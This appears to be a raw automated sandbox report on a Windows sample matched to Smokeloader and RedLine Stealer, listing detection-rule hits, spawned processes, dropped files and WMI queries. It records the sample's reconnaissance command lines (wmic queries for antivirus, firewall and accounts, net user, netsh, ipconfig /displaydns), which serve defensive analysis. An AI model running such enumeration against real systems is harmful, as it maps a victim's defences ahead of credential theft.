    Source: 00000005.00000002.1977659662.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000006.00000002.2327352814.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.1726254840.00000000004F1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.1726176567.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000008.00000002.2576079643.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000005.00000002.1976888383.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.1726400088.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000008.00000002.2576150006.0000000001FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000005.00000002.1976909715.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000006.00000002.2327481392.0000000000771000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@79/14@8/4
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_00503919 CreateToolhelp32Snapshot,Module32First,0_2_00503919
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D67138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,9_2_00007FF6F2D67138
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jghruerJump to behavior
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\35DB.tmpJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
    Source: ctMI3TYXpX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\AppData\Local\Temp\B972.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\AppData\Local\Temp\B972.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;92&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;324&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;408&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;484&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;492&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;552&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;620&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;628&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;752&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;776&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;784&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;872&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;920&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;988&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;364&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;356&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;696&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;592&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1044&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1084&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1176&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1200&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1252&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1296&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1316&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1408&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1476&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1488&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1496&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1552&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1572&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1652&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1724&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1824&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1840&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1940&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1948&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1956&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2036&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1932&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2064&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2152&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2216&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2268&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2388&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2396&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2508&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2528&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2552&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2608&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2616&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2624&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2632&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2748&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2900&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2012&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3304&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3536&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3768&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3816&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4032&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2544&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3404&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5108&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5484&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5704&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5860&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4920&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1328&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1668&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3980&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5428&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6040&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4868&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3428&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;8064&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5436&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3612&quot;::GetOwner
    Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: B724.tmp.13.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: ctMI3TYXpX.exeReversingLabs: Detection: 28%
    Source: ctMI3TYXpX.exeVirustotal: Detection: 38%
    Source: unknownProcess created: C:\Users\user\Desktop\ctMI3TYXpX.exe "C:\Users\user\Desktop\ctMI3TYXpX.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\jghruer C:\Users\user\AppData\Roaming\jghruer
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\35DB.exe C:\Users\user\AppData\Local\Temp\35DB.exe
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\hdhruer C:\Users\user\AppData\Roaming\hdhruer
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B972.exe C:\Users\user\AppData\Local\Temp\B972.exe
    Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
    Source: C:\Users\user\AppData\Local\Temp\B972.exeProcess created: C:\Windows\System32\cmd.exe cmd
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net accounts /domain
    Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 accounts /domain
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net share
    Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 share
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\35DB.exe C:\Users\user\AppData\Local\Temp\35DB.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B972.exe C:\Users\user\AppData\Local\Temp\B972.exeJump to behavior
